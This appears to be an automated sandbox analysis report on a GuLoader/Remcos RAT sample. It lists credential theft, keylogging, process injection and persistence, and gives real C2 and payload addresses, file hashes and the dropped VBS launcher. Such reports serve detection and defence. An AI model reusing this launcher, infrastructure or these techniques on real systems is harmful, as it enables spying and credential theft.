      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 22_2_0040DD85
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 22_2_004044A4
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B548E mov eax, dword ptr fs:[00000030h] 0_2_022B548E
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B2C93 mov eax, dword ptr fs:[00000030h] 0_2_022B2C93
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B36C3 mov eax, dword ptr fs:[00000030h] 0_2_022B36C3
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B7B16 mov eax, dword ptr fs:[00000030h] 0_2_022B7B16
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B87E3 mov eax, dword ptr fs:[00000030h] 0_2_022B87E3
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B73F1 mov eax, dword ptr fs:[00000030h] 0_2_022B73F1
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      Injects a PE file into a foreign processes
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Memory written: C:\Users\user\Desktop\loKmeabs9V.exe base: 400000 value starts with: 4D5A
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Memory written: C:\Users\user\Desktop\loKmeabs9V.exe base: 400000 value starts with: 4D5A
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Memory written: C:\Users\user\Desktop\loKmeabs9V.exe base: 400000 value starts with: 4D5A
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process created: C:\Users\user\Desktop\loKmeabs9V.exe 'C:\Users\user\Desktop\loKmeabs9V.exe'
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml'
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf'
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny'
      Source: loKmeabs9V.exe, 0000000E.00000002.1287036124.0000000000FB0000.00000002.00000001.sdmp Binary or memory string: Program Manager
      Source: loKmeabs9V.exe, 0000000E.00000002.1287036124.0000000000FB0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
      Source: loKmeabs9V.exe, 0000000E.00000002.1287036124.0000000000FB0000.00000002.00000001.sdmp Binary or memory string: Progman
      Source: logs.dat.14.dr Binary or memory string: [ Program Manager ]
      Source: loKmeabs9V.exe, 0000000E.00000002.1287036124.0000000000FB0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B73AF cpuid 0_2_022B73AF
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy, 22_2_0041881C
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 23_2_00407C79 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 23_2_00407C79
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_0041739B GetVersionExW, 22_2_0041739B
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      GuLoader behavior detected
      Source: Initial file Signature Results: GuLoader behavior
      Yara detected Remcos RAT
      Source: Yara match File source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, type: MEMORY
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\Desktop\loKmeabs9V.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Users\user\Desktop\loKmeabs9V.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Tries to steal Instant Messenger accounts or passwords
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
      Tries to steal Mail credentials (via file access)
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
      Tries to steal Mail credentials (via file registry)
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: ESMTPPassword 24_2_004033E2
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 24_2_00402DA5
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 24_2_00402DA5

      Remote Access Functionality:

      Yara detected Remcos RAT
      Source: Yara match File source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Native API 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | OS Credential Dumping 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Scheduled Task/Job | Registry Run Keys / Startup Folder 11 | Access Token Manipulation 1 | Obfuscated Files or Information 3 | Input Capture 11 | Account Discovery 1 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection 112 | Software Packing 12 | Credentials in Registry 2 | File and Directory Discovery 1 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 11 | Masquerading 1 | Credentials In Files 1 | System Information Discovery 329 | Distributed Component Object Model | Input Capture 11 | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 23 | LSA Secrets | Security Software Discovery 731 | SSH | Clipboard Data 1 | Data Transfer Size Limits | Application Layer Protocol 212 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Access Token Manipulation 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 23 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 112 | DCSync | Process Discovery 4 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

      Behavior Graph

      [Behavior graph image not preserved; details recoverable from the graph follow.]
      Behavior Graph ID: 457916
      Sample: loKmeabs9V.exe
      Startdate: 02/08/2021
      Architecture: WINDOWS
      Score: 100
      Sample signatures: Found malware configuration; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 8 other signatures
      Process loKmeabs9V.exe (started): Detected unpacking (changes PE section rights); Tries to steal Mail credentials (via file registry); Creates autostart registry keys with suspicious values (likely registry only malware); 5 other signatures
      Child process loKmeabs9V.exe (started): Tries to detect Any.run; Hides threads from debuggers; Installs a global keyboard hook; Injects a PE file into a foreign processes
        DNS/IP: 101.99.94.119, 49734, 80, SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY, Malaysia
        DNS/IP: wealthyrem.ddns.net, 194.5.97.128, 39200, 49735, 49736, DANILENKODE, Netherlands
        Dropped: C:\Users\user\AppData\Local\...\yourphone.exe, PE32
        Dropped: C:\Users\user\AppData\Local\...\yourphone.vbs, ASCII
      Processes started by the child process:
        loKmeabs9V.exe (started): Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file access)
        loKmeabs9V.exe (started): Tries to harvest and steal browser information (history, passwords, etc); DNS/IP: 192.168.2.1, unknown, unknown
        loKmeabs9V.exe (started)


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      loKmeabs9V.exe | 20% | Virustotal |
      loKmeabs9V.exe | 13% | ReversingLabs | Win32.Trojan.Vebzenpak
      loKmeabs9V.exe | 100% | Joe Sandbox ML |

      Dropped Files

      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe | 100% | Joe Sandbox ML |
      C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe | 20% | Virustotal |
      C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe | 6% | Metadefender |
      C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe | 13% | ReversingLabs | Win32.Trojan.Vebzenpak

      Unpacked PE Files

      Source | Detection | Scanner | Label
      22.2.loKmeabs9V.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1116566
      23.2.loKmeabs9V.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1116590
      24.2.loKmeabs9V.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1116590
      22.0.loKmeabs9V.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2

      Domains

      No Antivirus matches

      URLs

      Source | Detection | Scanner | Label
      http://www.imvu.comr | 0% | URL Reputation | safe
      http://101.99.94.119/WEALTH_PRUuqVZw139.bin | 0% | Avira URL Cloud | safe
      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
      http://www.ebuddy.com | 0% | URL Reputation | safe

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      wealthyrem.ddns.net | 194.5.97.128 | true | true | | unknown

        Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        http://101.99.94.119/WEALTH_PRUuqVZw139.bin | true | Avira URL Cloud: safe | unknown

        URLs from Memory and Binaries

        Name | Source | Malicious | Antivirus Detection | Reputation
        http://www.imvu.com/.exe | loKmeabs9V.exe, 00000017.00000002.470384906.000000000019C000.00000004.00000001.sdmp | false | | high
        https://www.google.com | loKmeabs9V.exe | false | | high
        http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe | loKmeabs9V.exe, 00000016.00000003.470222066.0000000000A02000.00000004.00000001.sdmp | false | | high
        http://www.imvu.comr | loKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
        https://support.google.com/chrome/answer/6258784 | loKmeabs9V.exe, 00000016.00000003.471770618.0000000000A18000.00000004.00000001.sdmp | false | | high
        http://www.imvu.com | loKmeabs9V.exe | false | | high
        https://www.google.com/chrome/static/images/favicons/favicon-16x16.png | loKmeabs9V.exe, 00000016.00000002.473021402.00000000006E8000.00000004.00000020.sdmp | false | | high
        https://support.google.com/chrome/?p=plugin_flash | loKmeabs9V.exe, 00000016.00000003.471770618.0000000000A18000.00000004.00000001.sdmp | false | | high
        https://www.google.com/accounts/servicelogin | loKmeabs9V.exe | false | | high
        https://login.yahoo.com/config/login | loKmeabs9V.exe | false | | high
        http://www.nirsoft.net | loKmeabs9V.exe, 00000016.00000002.472368637.0000000000193000.00000004.00000001.sdmp | false | | high
        http://www.nirsoft.net/ | loKmeabs9V.exe, loKmeabs9V.exe, 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmp | false | | high
        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | loKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp | false | Avira URL Cloud: safe | unknown
        http://www.ebuddy.com | loKmeabs9V.exe | false | URL Reputation: safe | unknown

                              Contacted IPs


                              Public

                              IP | Domain | Country | ASN | ASN Name | Malicious
                              194.5.97.128 | wealthyrem.ddns.net | Netherlands | 208476 | DANILENKODE | true
                              101.99.94.119 | unknown | Malaysia | 45839 | SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | true

                              Private

                              IP
                              192.168.2.1

                              General Information

                              Joe Sandbox Version:33.0.0 White Diamond
                              Analysis ID:457916
                              Start date:02.08.2021
                              Start time:14:59:17
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 17m 17s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:loKmeabs9V.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Run name:Suspected Instruction Hammering Hide Perf
                              Number of analysed new started processes analysed:41
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.phis.troj.spyw.evad.winEXE@9/4@1/3
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 50.6% (good quality ratio 40.6%)
                              • Quality average: 62.4%
                              • Quality standard deviation: 38.4%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                              • Excluded IPs from analysis (whitelisted): 13.88.21.125, 168.61.161.212, 20.49.157.6, 23.211.4.86, 93.184.221.240, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.50.102.62, 20.54.110.249, 20.190.160.134, 20.190.160.8, 20.190.160.71, 20.190.160.4, 20.190.160.75, 20.190.160.129, 20.190.160.67, 20.190.160.132, 51.124.78.146, 20.49.150.241, 20.82.210.154
                              • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                              Simulations

                              Behavior and APIs

                              Time | Type | Description
                              15:02:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.vbs
                              15:02:19 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.vbs

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN


                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe
                              Process:C:\Users\user\Desktop\loKmeabs9V.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):114688
                              Entropy (8bit):6.65828072595929
                              Encrypted:false
                              SSDEEP:1536:hSGTBAAP0gRQhGuloEWu6Y9yaipBhHaWQmiPYDqulcgRQhWSGTBAAP:hSGTBxChTlHWu6jbfFtDXlKhWSGTBx
                              MD5:E0D74762F123EB6603898D1482EB9752
                              SHA1:EE63AF5C34A027BA8B8331DD678B15E7A87D26A6
                              SHA-256:F06E4C96E86C0F36C82D38DE0627C0B81995656C4DCBC136C0FEDDA868ED8EA0
                              SHA-512:0F1DAEC7056919C4C7662DA12F99DC5300243B039EC98F162F1F6EB391DD9905B240ABFBC63AF3D662C0BA4AE6515FA11A3352B72354EE0C7A1B4147D2C2313A
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Virustotal, Detection: 20%
                              • Antivirus: Metadefender, Detection: 6%
                              • Antivirus: ReversingLabs, Detection: 13%
                              Reputation:low
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......J.................@..........D........P....@.................................r........................................K..(....p...[..................................................................(... .......|............................text....>.......@.................. ..`.data...\....P.......P..............@....rsrc....[...p...`...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.vbs
                              Process:C:\Users\user\Desktop\loKmeabs9V.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):116
                              Entropy (8bit):4.966412428636319
                              Encrypted:false
                              SSDEEP:3:jfF+m8nhvF3mRDWXp5cViE2J5xAIjuHChCn:jFqhv9IWXp+N23faihCn
                              MD5:B8755622AB5BB996534972B79851BBF5
                              SHA1:1ECF426DB043D2C14B307AA695132BBD037919DA
                              SHA-256:B05ECC5EB60DFE897EBFBEBCD8FDD2B3C25B5C0FD1882F7B30F822B5B22E6A7E
                              SHA-512:7123EF8223CB676399A9E74C371B028690EF2F07F614E25B0A34104BD062CEFBD456C5B0E82EFB6E0A34C79BBB93CD6488AC55C7B25EAAFCD81298FAC6DEDC48
                              Malicious:true
                              Reputation:low
                              Preview: Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe")
                              C:\Users\user\AppData\Local\Temp\syqduvyml
                              Process:C:\Users\user\Desktop\loKmeabs9V.exe
                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                              Category:dropped
                              Size (bytes):2
                              Entropy (8bit):1.0
                              Encrypted:false
                              SSDEEP:3:Qn:Qn
                              MD5:F3B25701FE362EC84616A93A45CE9998
                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview: ..
                              C:\Users\user\AppData\Roaming\remcos\logs.dat
                              Process:C:\Users\user\Desktop\loKmeabs9V.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):148
                              Entropy (8bit):3.323472271291229
                              Encrypted:false
                              SSDEEP:3:rklKlmvNBlfPl1NUlwi5JWRal2Jl+7R0DAlBG4LNQblovDl9il:IlKILHslj5YcIeeDAlybW/G
                              MD5:74C265BB113D25076A17CDBAED9500EB
                              SHA1:F6A406BB0D842FD7C189DD73A816998E1C98797E
                              SHA-256:C38067D9FFB58F898F2A038AC35C6A05EFCC30E3C3CA670CE037BBA1F9BD0B0C
                              SHA-512:00F4B99F135EFE290A6C4C20EA61B297DAF39A0671D4F7C9C2073688D4C053243930D99F231800043DD84614FB3EDA1AFF6055FE06157FB4008E1B07ADDFA7C9
                              Malicious:false
                              Reputation:low
                              Preview: ....[.2.0.2.1./.0.8./.0.2. .1.5.:.0.2.:.1.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].....

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.65828072595929
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:loKmeabs9V.exe
                              File size:114688
                              MD5:e0d74762f123eb6603898d1482eb9752
                              SHA1:ee63af5c34a027ba8b8331dd678b15e7a87d26a6
                              SHA256:f06e4c96e86c0f36c82d38de0627c0b81995656c4dcbc136c0fedda868ed8ea0
                              SHA512:0f1daec7056919c4c7662da12f99dc5300243b039ec98f162f1f6eb391dd9905b240abfbc63af3d662c0ba4ae6515fa11a3352b72354ee0c7a1b4147d2c2313a
                              SSDEEP:1536:hSGTBAAP0gRQhGuloEWu6Y9yaipBhHaWQmiPYDqulcgRQhWSGTBAAP:hSGTBxChTlHWu6jbfFtDXlKhWSGTBx
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......J.................@..........D........P....@................

                              File Icon

                              Icon Hash:6a6a2a6a2a2a2a2a

                              Static PE Info

                              General

                              Entrypoint:0x401144
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                              DLL Characteristics:
                              Time Stamp:0x4A04FEB2 [Sat May 9 03:55:30 2009 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:5565993a5a9f2bfb76f28ab304be6bc1

                              Entrypoint Preview

                              Instruction

                              Data Directories

                              Name | Virtual Address | Virtual Size | Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x14b94 | 0x28 | .text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x17000 | 0x5baa | .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
                              IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x7c | .text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                              Sections

                              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                              .text | 0x1000 | 0x13e14 | 0x14000 | False | 0.648217773437 | data | 7.07623900315 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .data | 0x15000 | 0x115c | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .rsrc | 0x17000 | 0x5baa | 0x6000 | False | 0.545979817708 | data | 6.0375627219 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                              Resources

                              Name | RVA | Size | Type | Language | Country
                              RT_ICON | 0x1bd02 | 0xea8 | data | |
                              RT_ICON | 0x1b45a | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 3507421495, next used block 3509654332 | |
                              RT_ICON | 0x1aef2 | 0x568 | GLS_BINARY_LSB_FIRST | |
                              RT_ICON | 0x1894a | 0x25a8 | data | |
                              RT_ICON | 0x178a2 | 0x10a8 | data | |
                              RT_ICON | 0x1743a | 0x468 | GLS_BINARY_LSB_FIRST | |
                              RT_GROUP_ICON | 0x173e0 | 0x5a | data | |
                              RT_VERSION | 0x171e0 | 0x200 | data | Chinese | Taiwan

                              Imports

                              DLL | Import
                              MSVBVM60.DLL | _CIcos, _adj_fptan, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp

                              Version Infos

                              Description | Data
